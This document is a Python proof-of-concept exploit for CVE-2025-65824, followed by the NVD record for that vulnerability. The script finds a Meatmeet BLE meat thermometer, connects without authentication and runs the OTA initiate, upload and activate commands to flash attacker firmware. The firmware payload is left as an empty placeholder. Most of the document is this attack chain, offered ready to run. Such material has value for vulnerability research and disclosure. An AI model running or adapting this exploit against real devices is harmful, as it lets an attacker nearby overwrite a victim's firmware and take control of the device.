CVE-2025-65824

# CVE-2025-65824 PoC - Meatmeet BLE OTA Firmware Exploitation # This PoC demonstrates the BLE OTA vulnerability in Meatmeet devices import asyncio from bleak import BleakClient, BleakScanner import struct import hashlib TARGET_DEVICE_NAME = "Meatmeet" OTA_SERVICE_UUID = "0000fe00-0000-1000-8000-00805f9b34fb" OTA_CONTROL_UUID = "0000fe01-0000-1000-8000-00805f9b34fb" OTA_DATA_UUID = "0000fe02-0000-1000-8000-00805f9b34fb" MALICIOUS_FIRMWARE = b"" class MeatmeetOTAExploit: def __init__(self): self.target_device = None self.client = None async def discover_device(self): """Discover Meatmeet device via BLE""" devices = await BleakScanner.discover() for device in devices: if TARGET_DEVICE_NAME in (device.name or ""): self.target_device = device print(f"[+] Found target: {device.name} ({device.address})") return True return False async def connect(self): """Connect to target device without authentication""" if not self.target_device: raise Exception("Target device not found") self.client = BleakClient(self.target_device.address) await self.client.connect() print(f"[+] Connected to {self.target_device.name}") async def initiate_ota_update(self): """Send OTA update initiation command""" ota_service = self.client.services.get_service(OTA_SERVICE_UUID) control_char = ota_service.get_characteristic(OTA_CONTROL_UUID) # OTA initiation command (device-specific) init_cmd = bytes([0x01, 0x00, 0x00, 0x00]) await self.client.write_gatt_char(control_char, init_cmd) print("[+] Sent OTA initiation command") await asyncio.sleep(0.5) async def send_malicious_firmware(self): """Send malicious firmware via BLE OTA""" ota_service = self.client.services.get_service(OTA_SERVICE_UUID) data_char = ota_service.get_characteristic(OTA_DATA_UUID) # Split firmware into chunks for OTA transfer chunk_size = 240 for i in range(0, len(MALICIOUS_FIRMWARE), chunk_size): chunk = MALICIOUS_FIRMWARE[i:i+chunk_size] await self.client.write_gatt_char(data_char, chunk) print(f"[+] Sent firmware chunk {i//chunk_size + 1}") await asyncio.sleep(0.01) print(f"[+] Sent {len(MALICIOUS_FIRMWARE)} bytes of malicious firmware") async def activate_firmware(self): """Activate the malicious firmware""" ota_service = self.client.services.get_service(OTA_SERVICE_UUID) control_char = ota_service.get_characteristic(OTA_CONTROL_UUID) # Activate command activate_cmd = bytes([0x03, 0x00, 0x00, 0x00]) await self.client.write_gatt_char(control_char, activate_cmd) print("[+] Sent firmware activation command") await asyncio.sleep(2) async def exploit(self): """Execute the full exploitation chain""" try: if not await self.discover_device(): print("[-] Target device not found") return False await self.connect() await self.initiate_ota_update() await self.send_malicious_firmware() await self.activate_firmware() print("[+] Exploitation complete - RCE achieved") return True except Exception as e: print(f"[-] Exploitation failed: {e}") return False finally: if self.client: await self.client.disconnect() async def main(): exploit = MeatmeetOTAExploit() await exploit.exploit() if __name__ == "__main__": asyncio.run(main())

{"cve": {"id": "CVE-2025-65824", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:08.137", "lastModified": "2026-01-21T19:06:23.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated attacker within proximity of the Meatmeet device can perform an unauthorized Over The Air (OTA) firmware upgrade using Bluetooth Low Energy (BLE), resulting in the firmware on the device being overwritten with the attacker's code. As the device does not perform checks on upgrades, this results in Remote Code Execution (RCE) and the victim losing complete access to the Meatmeet."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer_firmware:1.0.34.4:*:*:*:*:*:*:*", "matchCriteriaId": "9B669DA2-CF06-461F-B624-DCD0359D1656"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer:-:*:*:*:*:*:*:*", "matchCriteriaId": "1661B540-36E1-4BF0-BC63-9EC952560B54"}]}]}], "references": [{"url": "https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-remote-code-execution-md", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/Remote-Code-Execution.md", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}